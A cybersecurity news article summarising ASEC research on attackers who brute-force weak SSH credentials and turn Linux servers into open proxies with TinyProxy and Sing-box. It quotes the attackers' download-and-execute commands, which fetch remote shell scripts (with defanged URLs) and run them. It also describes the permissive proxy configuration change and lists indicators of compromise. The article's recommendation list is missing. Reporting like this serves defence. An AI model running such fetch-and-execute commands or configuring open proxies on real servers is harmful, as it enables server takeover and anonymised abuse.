The AhnLab Security Intelligence Center (ASEC) has sounded the alarm over a new wave of cyberattacks targeting Linux servers with weak or default SSH credentials.
Using sophisticated honeypots, ASEC has observed a sharp rise in attacks that exploit misconfigured servers to deploy proxy tools specifically, TinyProxy and Sing-box.
Unlike traditional malware, these attacks leverage legitimate open-source software, making detection and response more challenging for system administrators.
ASEC discovered that compromised Linux servers are being converted into proxy nodes with almost surgical precision.
Attackers, after brute-forcing SSH logins, execute simple yet effective commands to deploy their payloads. In one observed scenario, the following command was used to download and launch a malicious Bash script:
text(wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh
This script installs TinyProxy via the system’s package manager and configures it accordingly.
By purging restrictive “Allow” and “Deny” lines and inserting “Allow 0.0.0.0/0” into the configuration file, attackers grant unrestricted external access through TinyProxy’s default port 8888.
This effectively transforms the server into an open proxy, potentially enabling a range of anonymized cyber activities, such as DDoS operations and accessing illegal content.
Another alarming case involves the deployment of Sing-box, a powerful, open-source proxy tool capable of supporting multiple advanced protocols (vmess-argo, vless-reality, Hysteria2, TUICv5). Attackers gain elevated access, then run scripts like:
textbash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)
or
textwget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh
Initially developed to bypass regional restrictions on services like ChatGPT and Netflix, Sing-box is now being exploited by threat actors who install it on foreign Virtual Private Servers (VPS) for profit or anonymity.
With unauthorized Sing-box instances, attackers can reroute their traffic, evade law enforcement, or sell proxy access on underground markets.
This growing trend of abusing open-source proxies highlights the need for heightened server security. ASEC recommends that all Linux server administrators:
Proactive defense and vigilant monitoring are crucial in preventing servers from being recruited into illicit proxy networks that increasingly utilize legitimate tools to evade detection.
MD5
16d1dfa35d64046128290393512171ce
35d79027834a3b6270455f59b54f2e19URL
URL
https[:]//0x0[.]st/8VDs[.]sh
https[:]//raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…